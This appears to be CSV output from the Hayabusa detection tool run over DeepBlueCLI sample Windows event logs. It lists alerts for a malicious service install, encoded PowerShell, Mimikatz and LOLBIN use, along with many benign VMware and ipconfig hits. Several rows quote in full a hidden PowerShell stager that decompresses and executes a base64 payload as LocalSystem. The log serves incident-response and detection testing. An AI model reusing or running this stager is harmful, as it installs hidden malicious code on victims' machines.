Service Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:40:21.230 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:40:21.230 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x12c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x460 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.464 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x94c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.464 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.464 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.464 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.464 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command 
Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 21:05:56.876 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 21:06:09.220 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 21:06:09.236 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xff8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 22:54:48.689 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 22:54:48.720 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc0c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 22:54:49.720 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 22:54:49.751 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 22:55:08.329 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb0c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:04:23.954 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:06:57.658 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x85c | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:06:57.658 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcf4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:07:47.489 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:07:47.630 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:07:48.599 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:07:48.599 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x37c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-08-19 02:08:02.052 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:08:08.052 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:12:51.579 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x238 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:12:51.579 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:19:46.662 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:19:47.615 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:19:47.615 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:20:06.599 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:20:16.443 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3c0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:20:16.443 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | 
PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:20:16.834 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:57:54.551 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:57:54.738 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:57:55.301 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xef8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:57:59.004 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x82c | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:57:59.113 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:58:15.410 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbbc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 